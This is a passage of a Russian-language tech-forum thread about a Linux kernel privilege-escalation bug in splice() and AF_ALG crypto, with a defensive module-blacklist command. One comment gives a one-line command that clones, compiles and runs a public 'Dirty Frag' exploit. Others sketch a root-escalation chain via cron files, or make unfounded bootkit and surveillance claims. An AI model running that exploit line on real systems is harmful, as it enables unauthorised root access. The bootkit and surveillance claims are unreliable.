252. Сообщение от Аноним (251), 01-Май-26, 23:27	+/–
Внутри ядра - да. Внутри пользователя - да. Между ядром и пользователем - нельзя применять.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #192

253. Сообщение от Аноним (253), 02-Май-26, 06:33	+/–
На это и нужен RL - trial-and-errorами набирают dataset, на нём же в онлайне и обучают.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #242

254. Сообщение от Аноним (254), 02-Май-26, 06:36	+/–
Было бы лучше, если бы они его без всякой рекламы АНБ продали? Или если бы они его под сукном держали, но так как контора занимается кибербезопасностью, то она нарушила кучу законов о копирайте, и к ней прикомандирован сотрудник спецслужб, и как только она скажет "мы не патриоты, наш эксплоит не дадим" - так все эти нарушения тут же будут переданы в суды.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #181 Ответы: #277

255. Сообщение от Аноним (255), 02-Май-26, 06:46	+/–
Мне сегодня в дебиан прилетело обновление пакета с ядром до 7.0.3+deb14-amd64, и выяснилось, что lkrg убивает там вообще все процессы.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #257, #258, #291

256. Сообщение от Аноним (256), 02-Май-26, 08:30	+/–
PoC и эксплоит — не одно и то же.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #93

257. Сообщение от Аноним (266), 02-Май-26, 09:36	+/–
Для Debian это левый пакет, который требует настройки под конкретный дистрибутив. Там где он есть в дистро-репо, там можно им пользоваться не настраивая.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #255

258. Сообщение от Аноним (266), 02-Май-26, 09:39	+/–
Устанавливать этот пакет в sid, где всё постоянно меняется, нелогично.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #255

259. Сообщение от Аноним (266), 02-Май-26, 09:47	+1 +/–
Это сильно подорвало доверие к сопровождению ядра. Может сама модель сопровождения ядра трещит по швам (хотя здесь уместнее вываливается из штанов)?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #233 Ответы: #263

260. Сообщение от Tron is Whistling (?), 02-Май-26, 09:49	+/–
Повторюсь здесь. Всем похрен, что в этой поделке и как передаётся. Потому что речь идёт о механизмах, между которыми и этой поделкой - несколько световых лет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #251

261. Сообщение от Аноним (261), 02-Май-26, 09:51	+/–
А почему так, интересно? То есть, в данном случае это сыграло им на руку, но, вообще говоря, казалось бы, дело благое, быстрая криптография.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #239 Ответы: #281, #282

262. Сообщение от Аноним (266), 02-Май-26, 09:52	+/–
Шифрование это данный случай. Суть в неправильном применении splice() (в общем случае, небезопасной функции) в неподходящей ситуации.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #220 Ответы: #264

263. Сообщение от Tron is Whistling (?), 02-Май-26, 10:57	+/–
Вообще сопровождение много чего трещит по швам. "Деды" уходят, а адепты цыцда могут только трещать о том, как прекрасно всё должно быть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #259 Ответы: #283

264. Сообщение от Tron is Whistling (?), 02-Май-26, 11:00	+/–
Суть в неправильном понимании сплайса тем, кто оптимиздил модуль...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #262 Ответы: #265

265. Сообщение от Аноним (266), 02-Май-26, 11:23	+/–
Ну он же должен был понимать, что zerocopy не берется из воздуха.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #264 Ответы: #287

266. Сообщение от Аноним (266), 02-Май-26, 11:26	+/–
Это Ваше предположение. Может он наступил на мозоль долго кормящимся на этом?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #181

267. Сообщение от Хру (?), 02-Май-26, 12:07	+/–
Проверил - gvisor реально помог бы от этой дряни: address family not supported.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92

268. Сообщение от Fareast (ok), 02-Май-26, 14:10	+/–
В этом и фишка что в ИИ загрузили все знания планеты, в этом датасете есть все что знает человечество, ни один человек не способен запомнить и понять такой объем информации. Даже если рассматривать ИТ, каждый специалист имеет свою специализацию и не способен знать все про ИТ начиная от чипа, заканчивая программированием. Т.е. нет соперника ИИ, он в 2 сигма случаев будет лидером в любой выборке людей. Да, уникомы есть за пределами 2 сигм, но они не будут формировать общую картину
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #242 Ответы: #294

269. Сообщение от Аноним (269), 02-Май-26, 17:56	–1 +/–
Наверно из за этой уязвимости у меня лазили постоянно, отключали https-dns-proxy в LibreCMC 6.7, в OpenWrt 24.10.5-25.12, и устанавливали программы без моего ведома в Hyperbola Linux-libre 0.4.4 которая без dbus и systemd(на которую я надеялся от вторжения из вне), и даже запущенный Alpinelinux без dbus,( с заблокированной командой apk add !dbus при установке системы, чтобы не тянул свои зависимости) в qemu на Hyperbola не помог, так как и в alpinelinux управляли браузером LibreWolf(издевались, и давали понять мне, что они могут проникнуть и управлять!), блокировали вкладки воспроизведения видео определённого содержания для просветления(другие работали!), перезагружали вкладки, выводили из строя браузер(перезагружая все вкладки) + Так как я целевой человек, то они видят моими глазами, слышат ушами, и читают мысли, надомной постоянно издеваются, я уже просто не обращаю на всё это внимание, и не реагирую! И это при том, что у меня LibreCMC стоит на провайдерский ростелекомовский входной интернет с отключённым ssh и изменённым портом, далее OpenWrt с отключённым ssh и изменённым портом, далее в Hyperbola Linux-libre отключённый ssh и изменённым портом, и в Alpinelinux отсутствует ssh, так как отклонил его при установке! Последовавательность подключений такая, LibreCMC(провайдерский интернет + https-dns-proxy)-->OpenWrt 24.10.5 + https-dns-proxy-->OpenWrt 25.12.0 + zapret-->Hyperbola Linux-libre-->qemu + alpinelinux. Далее прописал команды echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead. conf и rmmod algif_aead 2>/dev/null как в Hyperbola Linux-libre, так и в Alpinelinux запущенной в qemu, осталось ждать обновление ядер у устранением уязвимостей в LibreCMC, в OpenWrt и в Hyperbola Linux-libre! Но это не все прелести издевательства, просто описал то, что возможно подходит под эту уязвимость.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #270, #271

270. Сообщение от Аноним (270), 02-Май-26, 18:48	+1 +/–
> Так как я целевой человек, то они видят моими глазами, слышат ушами, и читают мысли, надомной постоянно издеваются, я уже просто не обращаю на всё это внимание, и не реагирую! Ну если пить таблетки, которые прописал психиатр, то таких проблем не будет. Но это не точно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #269 Ответы: #286

271. Сообщение от Аноним (269), 02-Май-26, 21:11	+/–
Дополняю комментарий, так как нет возможности изменить/добавить, так как забыл написать о том, что + был отключён ipv6 во всех маршрутизаторах(LibreCMC/OpenWrt/), и в Hyperbola Linux-libre, + в Alpinelinux обновлено ядро на последнюю версию 6.18.26-0-lts +  после опубликовывания первого комментария, мне снова показали/дали понять, а именно искусственно перезагрузили/отправили вкладку в перегруз, и для дальнейшего использования нужно перезагрузить вкладку.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #269 Ответы: #284, #285

272. Сообщение от Аноним (272), 03-Май-26, 00:09	+/–
Эта уязвимость направленна на конкреный язык исходников, потому - нечего тут приплетать другие языки. Будет ядро на другом - уязвимости будут писаться уже под него...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #185

273. Сообщение от userX (?), 03-Май-26, 00:13	–3 +/–
Не SUID зло, а Ся! Кривая-косая ушибленная)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #309

274. Сообщение от Аноним (272), 03-Май-26, 00:54	+/–
> Чего в датасете нет, то никакая нейросеть никогда не найдет. Они сранительно давно уже неплохо анализировать что угодно умеют. Из личных наблюдений. И думаешь для чего очень давно ИИ используют для поисках новых ДНК, в химпромышленности, металоведении и электронике, например.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #242

275. Сообщение от Аноним (272), 03-Май-26, 01:32	+/–
Т.б. умение программировать без ошибок и ум - вещи мягко сказать разные... А, про время затрачиваемое на программирование - молчу. Т.б.если давать столько же времени а в идеале и доступ к тестовому стенду - не факт что не исправит постепенно все свои ошибки в итоге. Многие из вас смогли бы программировать без ошибок - не имея "стенда"?... Я лично уверен - что, никто. По кр.мере без куда длительней опыта чем обычно. Большинство же, если не все, - как видим [только по ядру Линукс]: и с ним. А, по обширности знаний... А, языков. И это ведь вы видите только "игрушечные" модели, под ПК, а представьте что там в плане знаний и ума - на майнфреймах!  Помноженные на развитие не всего то пару лет - а, намного куда более... Другое дело что, все ИИ минимум доступные публично - ещё и сильно скрыто зацензурованны авторами, сатанистам и zog или их идеалогически холуев в ч.н.атеистами сами по себе, что существенно искажает восприятие и мышление вообще и в ч.н. в научной сфере("2+2=4!"{aka "чудес не бывает!"} - брехня! я как то даже полудесятком разных способов это опроверг на одном сайте по сути форуме), т.б. искажения в исторических и политических вопросах, т.б.моральных. Притом, с моралью у ИИ вообще серьёзные проблемы что объясняет не только такими же авторами и т.б.их целями в этом но и просто большей уязвимостью чем человек, посредством входной информации, в т.ч.подсовываемой им в Internet да и книгах, сатанистами разными. Всё как и у людей с дезой, но уязвимость ещё больше.  Потому и все плюсы и минусы такого типа ИИ - тоже как у людей... Потому ВСЕГДА БУДУТ ОШИБАТЬСЯ - аналогично людям. Другое дело что и люди в разно степени ошибаются, но тем не менее. И по сути это я ещё за 30 лет назад  до современных ИИ вывел т.ск. математически-эвристически, после чего  перестал интересоваться темой ИИ, а до того была тоже крутилась мысль, как ныне вижу вбиваемая крипто-сатанистами, что мол ИИ - все проблемы человечества решит: станет идеальным президентом или судьёй человечеству, но нет - чудеса бывают но, не настолько - может быть лишь мимикрия под это, что бы с помощью ИИ его создателям управлять другими, опять же всё как и с людьми, и что хуже - даже если авторы это по любым причинам не будут делать - идеала всёравно не получится, т.к. собственно такова природа любого мышления, если совсем лаконично. Потому оставьте непогрешимость Папе Римскому и просто не ждите чудес там где им не полагается быть по определению. Ну и смотрите внимательней на тех кто прихо-манипулируя выворачивает всё это...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #249 Ответы: #295

276. Сообщение от Аноним (272), 03-Май-26, 01:45	+/–
>  кто запрещает пользоваться Х11 Инвесторы, владельцы и авторы Arch, Ubuntu, Debilian, мало?  список же огромен
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #167 Ответы: #201

277. Сообщение от Аноним (272), 03-Май-26, 01:52	+/–
Было бы лучше если бы они сами написав патч отослали в ядро с требованием внеплановго релиза его и затем уже пиарились, при выходе новой его версии. А, так просто подстава всем. Молодцы! Странно что, их ещё не закрыли только за такое, хотя...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #254

278. Сообщение от Аноним (272), 03-Май-26, 01:59	+/–
> 7.0. 6.19 Люди только что, на 6.18.xx перешли, да что там на 2.x и 3.x пожизненно сидят наивно веря в непробиваемость Linux и из-за мега-тормознутости ядра - а, тебе на 7.x переход подавай!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #203

279. Сообщение от Аноним (272), 03-Май-26, 02:01	+/–
> Будет ещё один аргумент в пользу микроядер Будет просто другой backdoor, т.б. тут и сложность куда больше...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #204

280. Сообщение от Аноним (272), 03-Май-26, 02:11	+/–
Сейчас же не 1970-тые...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #219

281. Сообщение от Аноним (272), 03-Май-26, 02:22	+/–
> А почему так, интересно? Ну, вот и думай... сколько лет или десятилетий только эту дыру использовали, благодаря автору ядра, как ответственному "проверяющему", как и типа "opensource-сообществу же" само-обману. И сколько там ещё... не даром же 666 в chmod и каждой ПК из-за библиотек [Сей], демоны а, в BSD и черты водятся.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #261

282. Сообщение от Аноним (272), 03-Май-26, 02:25	+/–
> А почему так, интересно? Ну, вот и думай... сколько лет или десятилетий только эту дыру использовали, благодаря автору ядра, как ответственному "проверяющему", (как и благодаря типа "opensource-сообществу же" само-обману). И сколько там ещё... не даром же 666 в chmod и каждом файле из-за библиотек [Сей],  демоны, а в BSD и черти, водятся.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #261

283. Сообщение от Аноним (272), 03-Май-26, 02:35	+/–
Как будто с ними не трещало... Могу даже напомнить только (уже довольно древнюю)книгу по линуху от Мышх... с кучей такого.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #263 Ответы: #288

284. Сообщение от Аноним (272), 03-Май-26, 02:55	+3 +/–
> Наверно из за этой уязвимости у меня лазили постоянно Если это было до публикации topic оригинальными авторами то, это явно слишком сложный путь, всё скорей куда тривиальней - вирус/троян. Начни кардинально - со смены ОС, т.б.тестово можно попробовать на LiveDVD, если не будет такого - попробуй нужную ОСь [на другой диск] установить (если нет LiveCD), проверить. Может и сама ОСь быть инфицированна от автора или на его и промежутрчных серверах или роутере/модеме другими завирусованно. Хот скорей автором. А, что ты хочешь от всех эти Linux троянно-пейсателей самих по себе. ДА и если бы нета от их качества сборки в этом, и т.б.уж если серверы MS и Пентагона взламывали. Думаешь зачем некоторые люди препочитают винды на CD/DVD покупать а, не скачивать с торрентов, бнволения в ручную устанавливая, а то и в сеть выделенный пк не пуская, пусть всё это тоже само-обман для успокоения - но, всё же минус куча посредников. Ну а,  шире говоря - ты же вообще троянским конём пользуешься под видом цифровой техники...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #271

285. Сообщение от Аноним (272), 03-Май-26, 03:02	+/–
Поясни в чём проблематичность безопасности dbusd (и вообще зачем оно и кем используется, в ч.н. что происходит и нужны ли хаки - если его удалить). Какие дистры его и т.п. - не используют (наравне с SYSTEMD).
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #271

286. Сообщение от Аноним (272), 03-Май-26, 03:16	+/–
От них - точно его самого ускоренно не будет... так или иначе. > Так как я целевой человек, то они видят моими глазами, слышат ушами, и читают мысли, надомной постоянно издеваются, я уже просто не обращаю на всё это внимание, и не реагирую! Если не врёшь: ты что про нечисть не слышал?...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #270 Ответы: #289

287. Сообщение от Tron is Whistling (?), 03-Май-26, 08:14	+1 +/–
> Ну он же должен был понимать, что zerocopy не берется из воздуха. Ну вообще да, всё очень просто, и страницы как scratchpad использовать - школьник разве что, что маловероятно. Поэтому наиболее вероятен второй вариант: он прекрасно понимал, что zerocopy берётся не из воздуха. А вот косой scratchpad в 4 байта тысячиглаз не заметят - ну scratchpad и scratchpad.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #265

288. Сообщение от Tron is Whistling (?), 03-Май-26, 10:37	+1 +/–
Основная проблема адептов цыцда в том, что они ждут, пока кто-то со стороны им сделает то, что можно в цыцду. Деды как раз таки и делали, но деды стареют и уходят.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #283

289. Сообщение от Аноним (269), 03-Май-26, 10:48	+/–
Благодарю за внимание, но правильно и уважительно обращаться на Вы. Не вру, про нечисть не то что слышал, но и на себе ощутил/испытал, + меня запрограммировали набрать моими руками(как в фильме читающие мысли 2014) название фильмов пульс(разных годов выхода и версий), и посмотреть! + со мной издеваются и как в фильме Геймер 2009(перехватывают управление мною, моими близкими, и родственниками)! Разное происходило ещё годами ранее. Я ушёл от OpenBSD, так как и на ней чудеса происходили(я думал что из за dbus). Я даже пробовал сидеть в live режиме usb флешки Fuguita(основана на OpenBSD), мне и тогда дали понять, что они могут управлять и в живой системе! Много раз перекачивал/переустанавливал Devuan, GnuinOS(уже переименовался в Genuen), OpenBSD, Fufuita, Alpine, Hyperbola Linux-libre, перепрошивал bios, + менял пароли, и пока нет возможности пользоваться обсолютно чистым железом! Скорее всего используются закладки в IntelME, + в bios, + используются всевозможные ресурсы вредительских структур для отработки программ над целевым человеком! Жду выхода HyperbolaBSD на архитектурах riscv/arm , чтобы обойти лазейки/уязвимости в intelME и в bios/загрузчике, чтобы сузить вторжение из вне!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #286 Ответы: #322

290. Сообщение от anoName (?), 03-Май-26, 14:46	+/–
чтобы получить доступ рут надо иметь доступ рут, добавить две библиотеки, обновить питон, скомпилировать, и вот у вас доступ рут! )
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

291. Сообщение от Аноним (291), 03-Май-26, 15:47	+/–
В общем, ребята, LKRG не виноват, он отработал как требуется. Это буткит APT-уровня, в прошивке жёсткого диска.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #255 Ответы: #292, #311

292. Сообщение от Аноним (291), 03-Май-26, 15:56	+/–
Вы можете проверить его у себя, штуковина модифицирует initrd при чтении его с жёсткого диска, при последующих чтениях хеш-суммы выдаёт прежние, а при оригинальном ... в общем когда читает grubом, то вроде та же хеш сумма, и пытается обойти lkrg, но не всегда удачно. Чтобы обход lkrg не удался, нужно cp /boot/initrd.img-7.0.3+deb14-amd64 /boot/blahblahblah sync rm /boot/initrd.img-7.0.3+deb14-amd64 sync mv /boot/blahblahblah /boot/initrd.img-7.0.3+deb14-amd64 sync и перезагрузиться на горячую, при перезагрузке процесс загрузки зависнет, так как образ перемещён в другие сектора, и пропатчить его на лету с целью обхода lkrg малварь не сможет, в результате чего попытка поманипулировать ядром провалится, и загрузка зависнет. Если вы сделает абсолютно то же самое, но добавите nolkrg, то загрузка пройдёт, после чего грузиться уже будет. Если прогрузить на холодную, с выключением питания, то загрузится, видимо патч для прошивки hdd при старте читает ФС и определяет, в каких секторах лежит initrd. При горячей перезагрузке жёсткий диск не перестартует, соответственно патч не пересчитывает места. Я правда не умею его ковырять, так что без ваших советов не обойтись. Я серьёзно, это не глюки не шиза.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #291 Ответы: #321

293. Сообщение от Аноним (214), 03-Май-26, 17:39    Скрыто ботом-модератором	+1 +/–
>а в линуксе команды вводить, хоть минимальный интелект включать рекомендуемый способ установки большинства софта в лайноксе: curl | sh. Интеллектуалы мамкины.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #187

294. Сообщение от Аноним (214), 03-Май-26, 17:53	+/–
>В этом и фишка что в ИИ загрузили все знания планеты, в этом датасете есть все что знает человечество Будь это так, не существовало бы ни коммерческих, ни военных тайн, например.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #268 Ответы: #303

295. Сообщение от Аноним (214), 03-Май-26, 17:55	+1 +/–
> представьте что там в плане знаний и ума - на майнфреймах Нет там никакого ума - там байесовский поиск. Остальной приход комментировать лень.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #275

296. Сообщение от Аноним (214), 03-Май-26, 17:57	+/–
git tag --contains.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #203

297. Сообщение от Аноним (214), 03-Май-26, 18:01	+/–
> Его виртуальные процессоры — это обычные потоки хостовой ОС, и он может выдавать гостю разные флаги CPUID на разных ядрах Я деталей не помню - часть это VMCS или нет, но для KVM флажки CPUID точно нужно указывать в управляющей структуре.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #245

298. Сообщение от Аноним (298), 03-Май-26, 18:17	+/–
И эти эксперты разрабатывают операционные системы...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #88

299. Сообщение от morphe (?), 03-Май-26, 20:10	+1 +/–
> Там нет блд буферов. Там СТРАНИЦЫ. Которые вообще не известно, чьи в > данном случае. В данном случае их используют как буферы, из них читают и пишут через обычные индексы [], какая разница на что эти буферы ссылаются?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #190 Ответы: #300

300. Сообщение от Tron is Whistling (?), 03-Май-26, 23:03    Скрыто ботом-модератором	+/–
Вот именно, что никакой. Но это не про хруст.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #299

301. Сообщение от Аноним (301), 03-Май-26, 23:29	+/–
> Прилетает прямая ссылка на страницу памяти с полным доступом. Идёт сишник по коду, ему прилетает прямая ссылка на страницу памяти с полным доступом. Он залез в неё и сгорел.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #232

302. Сообщение от Аноним (301), 03-Май-26, 23:32	+/–
А ты не запускай левый код и не пускай левых людей :) Дыра что надо, туту вопросов нет. Но если к тому времени когда кто-то из-под локального юзера что-то может запустить без твоего разрешения у тебя всё ещё нигде не загорелась красная лампочка... Ну что ж, желаю вам немного SELInux и обсервабилити получше.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10 Ответы: #306

303. Сообщение от Fareast (ok), 04-Май-26, 03:58	+/–
Базовые знания открыты, что там в коммерческих, военных тайнах важного? имхо там статистическая погрешность за пределом трех сигм и выбросы, которые только ухудшают общую картину знаний
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #294

304. Сообщение от пох. (?), 04-Май-26, 12:29	+/–
нет, потому что ты забыл посчитать время увлекательного процесса по расстановке миллиарда ненужных галочек и поддержания его в актуальном состоянии (и потом еще и возможно повтора сборки когда выяснится что галочка все же была нужной, но ты об этом не знал) а машина - она железная, ее время почти ничего или совсем ничего (всегда включена) не стоит все это было бессмысленной возней уже в конце нулевых
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #109

305. Сообщение от пох. (?), 04-Май-26, 12:31	+/–
обычный индусский код. просто и тяп-ляп-тяп-ляп свое ценное имячко в историю комитов. тысячегласс как обычно смотрел на colour в комментариях и не заметил, ой, пять лет  (а говоришь - просто)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

306. Сообщение от Tron is Whistling (?), 04-Май-26, 13:50	+2 +/–
Не надо ничего запускать. Пробивается RCE в софте, запущенном от непривилигерованного юзера. Через splice() и IF_ALG пробивается файл, который у тебя в кроне/на таймере от рута. Всё остальное выполняется от рута этим файлом, и никакой обсерабилити тебе уже не поможет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #302 Ответы: #313

307. Сообщение от Tron is Whistling (?), 04-Май-26, 13:53	+/–
При условии, что у тебя есть финансы и ресурсы гугла на это - да, взлетит.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #237 Ответы: #314

308. Сообщение от Проходил мимо (?), 04-Май-26, 14:06	+/–
Связка из Arc + Mutex используется в многопоточной среде для того, чтобы безопасно работать с данными из разных потоков.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #251

309. Сообщение от Проходил мимо (?), 04-Май-26, 14:12	+/–
Инструмент не может быть добром или злом. Инструмент - это лишь инструмент и ничего более. А уж как им пользоваться зависит от уровня рукожопости конкретного программиста.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #273 Ответы: #319

310. Сообщение от нах. (?), 05-Май-26, 10:10	+/–
ограничили, да. Большинству процессов он и нахрен вот не нужон - во-первых им никакая суперпроизводительность на ведроиде и не нужна, во-вторых все равно не используют. Ты, кстати, тоже так можешь. (неплохой паллиатив безусловному блэклистингу модуля)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47

311. Сообщение от Аноним (311), 05-Май-26, 10:37	+/–
P.S. Я вот этот вот товарищ: https://www.opennet.me/openforum/vsluhforumID3/139023.html#70 Перед solardizом извиняюсь, lkrg таки сработал, дело не в тестировании, а в бутките.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #291

312. Сообщение от Аноним (301), 06-Май-26, 03:18	+/–
Нормальные админы пишут скрипты исключительно на POSIX Shell. По башизмам определяют профнепригодных.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #141

313. Сообщение от Аноним (301), 06-Май-26, 03:20	+/–
А как туда этот юзер попал? Я уж про софт не спрашиваю, вижу что вы из тех, кому и curl | bash нормально.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #306 Ответы: #316, #317

314. Сообщение от Аноним (301), 06-Май-26, 03:27	–1 +/–
Ну или мозги и пара часов свободного времени почитать как оно устроено и как им пользоваться. Для тех, у кого с мозгами совсем беда, нарисовали комикс.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #307 Ответы: #318

315. Сообщение от Аноним (301), 06-Май-26, 03:32	+/–
Есть ещё секретные технологии. Можно вообще без AOSP, QubesOS, и даже без SELinux. Я тебе расскажу, но ты никому, ладно? Берёшь два лаптопа. С одного занимаешься только взрослой жизнью -- банк, налоги, бизнес. А тикток, опеннет, и curl | bash всегда делаешь только на втором. Я так двадцать лет делаю, брат жив.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22

316. Сообщение от Tron is Whistling (?), 06-Май-26, 08:50	+/–
А, так вы airgapped? Пгостите, а зойчем вам в айргапеде селинух?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #313 Ответы: #323

317. Сообщение от Tron is Whistling (?), 06-Май-26, 08:52	+1 +/–
Вообще конечно волшебно :D Софт у нынешних девляпсов - он не из-под юзера в системе работает, а с помощью магии. И в систему не попадает, а так, сбоку отирается.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #313

318. Сообщение от Tron is Whistling (?), 06-Май-26, 08:53	+1 +/–
Слушай, читая тебя, я внезапно начинаю понимать девляпсинг. Вернее то, почему он неадекватен.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #314

319. Сообщение от Аноним (319), 06-Май-26, 10:14	+1 +/–
Огнемёт - зло по определению и не может быть добром. Тем не менее инструмент. Оспорь.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #309 Ответы: #332

320. Сообщение от Аноним (321), 06-Май-26, 18:00	+2 +/–
А разгадка проста: безблагодатность убогого монолита, у которого весь страничных кэш - W|X.
Ответить | Правка | Наверх | Cообщить модератору

321. Сообщение от Аноним (321), 06-Май-26, 18:08	+/–
Это именно, что глюки наркомана. initrd - это образ ФС, который может быть в разных форматах, да еще и сжат при этом.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #292

322. Сообщение от Пыщь (?), 07-Май-26, 11:26	+/–
Остаётся ДОСя! "Она и микробов убивает"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #289

323. Сообщение от нах. (?), 07-Май-26, 13:57	+1 +/–
на всевышнего надейся, а верблюда все равно привязывай, подумала монашка, надевая на свечку второй презерватив!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #316

324. Сообщение от нах. (?), 07-Май-26, 13:58	+/–
товарищмайор - тут иноагендская паскуда - пользоваться нихатит!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #153

328. Сообщение от dimuspav (ok), 08-Май-26, 09:40	+1 +/–
copy Fail №2 "Dirty Frag" git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Ответить | Правка | Наверх | Cообщить модератору

329. Сообщение от PnD (??), 12-Май-26, 13:28	+/–
> Почему не может? Вполне можно наменять так, что оригинальная функция не пострадает.   Ну разумеется. Получить рута и вернуть испорченное на место. Элементарно. Но надо было хотя бы попытаться навести тень на плетень. ЦА таких вбросов обычно не может ни в схемотехнику ни в программирование. А тут им прямо готовое занесли, ладно хоть не на сях сразу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #191

331. Сообщение от Аноним (331), 17-Май-26, 05:41	+/–
Ядро 6.18.31 патч вроде как уже применен изначально, но эксплоит успешно работает.
Ответить | Правка | Наверх | Cообщить модератору

332. Сообщение от Аноним (332), 18-Май-26, 13:17	+/–
Когда на чердаке дома появляется колония каких нибудь страшных австралийских насекомых - огнемет становится добром.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #319

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема